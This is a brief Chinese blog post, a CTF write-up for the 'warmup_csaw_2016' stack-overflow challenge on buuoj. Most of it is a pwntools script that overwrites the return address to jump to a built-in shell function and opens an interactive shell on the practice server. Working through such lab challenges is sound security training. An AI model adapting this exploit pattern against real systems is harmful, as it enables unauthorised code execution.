pwn | warmup_csaw_2016

warmup_csaw_2016

闲的没事干写个pwn题玩。
在buuoj上面看的。

image

栈溢出,ret2text。

直接给了shell地址只要溢出就好。
exp:

from pwn import *
import base64
import time

context.log_level = 'debug'

sh = remote('node4.buuoj.cn', 26803)
# sh = process('./warmup_csaw_2016')
time.sleep(1)

sh.recv()
# sh.recvall()
# f = base64.b64decode(f)
payload = b'a'*0x48+p64(0x40060d)
print(payload)
sh.sendline(payload)

#sh.recv()
sh.interactive()
sh.close()

over.

posted @ 2021-11-12 00:00  Mz1  阅读(48)  评论(0编辑  收藏  举报